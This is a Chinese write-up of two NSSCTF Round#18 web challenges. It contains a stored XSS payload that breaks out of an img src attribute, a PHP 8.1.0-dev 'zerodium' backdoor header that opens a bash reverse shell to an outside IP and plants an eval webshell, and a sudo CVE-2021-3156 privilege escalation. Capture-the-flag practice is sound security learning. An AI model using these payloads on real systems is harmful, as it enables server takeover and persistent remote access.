【Web】NSSCTF Round#18 Basic个人wp(部分)

【Web】NSSCTF Round#18 Basic个人wp(部分),第1张

目录

①门酱想玩什么呢?

②Becomeroot


①门酱想玩什么呢?

先试一下随便给个链接

【Web】NSSCTF Round#18 Basic个人wp(部分),第2张

不能访问远程链接,结合评论区功能,不难联想到xss,只要给个评论区链接让门酱访问就可

我们研究下评论区

【Web】NSSCTF Round#18 Basic个人wp(部分),第3张

从评论区知道,要让门酱玩元梦之星,考虑直接

<script>document.location="https://ymzx.qq.com/";</script>

尝试传了发现不能起作用跳转,估计是<>这些被html实体化了

【Web】NSSCTF Round#18 Basic个人wp(部分),第4张

那咋整呢,题目里还提供了评论插入图片功能

我们就按示例传一下(必须以http://开头,否则不能解析为图片)

【Web】NSSCTF Round#18 Basic个人wp(部分),第5张

 【Web】NSSCTF Round#18 Basic个人wp(部分),第6张

链接是插入到了src中,我们可以直接用">闭合img标签

评论传

http://"><script>document.location="https://ymzx.qq.com/";</script>.png 123 /png

 成功重定向到元梦之星官网

【Web】NSSCTF Round#18 Basic个人wp(部分),第7张

bp抓包

【Web】NSSCTF Round#18 Basic个人wp(部分),第8张

获得该条恶意评论链接

http://node1.anna.nssctf.cn:28834/words/?title=MQ%3D%3D&content=aHR0cCUzQSUyRiUyRiUyMiUzRSUzQ3NjcmlwdCUzRWRvY3VtZW50LmxvY2F0aW9uJTNEJTIyaHR0cHMlM0ElMkYlMkZ5bXp4LnFxLmNvbSUyRiUyMiUzQiUzQyUyRnNjcmlwdCUzRS5wbmclMjAxMjMlMjAlMkZwbmc%3D

把这个链接给门酱即可获得flag

【Web】NSSCTF Round#18 Basic个人wp(部分),第9张

②Becomeroot

进来直接告诉我们php版本是8.1.0-dev

【Web】NSSCTF Round#18 Basic个人wp(部分),第10张

PHP-8.1.0-dev 后门命令执行漏洞复现_php/8.1.0-dev-CSDN博客

User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/124.222.136.33/1337 0>&1'");

【Web】NSSCTF Round#18 Basic个人wp(部分),第11张直接反dshell,发现要提权

【Web】NSSCTF Round#18 Basic个人wp(部分),第12张

【Web】NSSCTF Round#18 Basic个人wp(部分),第13张

GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令

脚本不太好整到靶机上,还是写马连webshell方便点

User-Agentt: zerodiumsystem("echo '<?php eval(\$_POST[1])?>'>/var/www/html/1.php");

【Web】NSSCTF Round#18 Basic个人wp(部分),第14张

【Web】NSSCTF Round#18 Basic个人wp(部分),第15张

尝试用suid提权插件来整,失败

【Web】NSSCTF Round#18 Basic个人wp(部分),第16张

发现题目提示:

【Web】NSSCTF Round#18 Basic个人wp(部分),第17张

看一下sudo版本

【Web】NSSCTF Round#18 Basic个人wp(部分),第18张 

不难找到对应CVE

CVE-2021-3156 sudo权限提升漏洞

GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令 脚本传到服务器的/tmp目录下

【Web】NSSCTF Round#18 Basic个人wp(部分),第19张

 

进行提权,直接rce

【Web】NSSCTF Round#18 Basic个人wp(部分),第20张

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/web/13518828.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2024-03-12
下一篇 2024-03-14

发表评论

登录后才能评论

评论列表(0条)

保存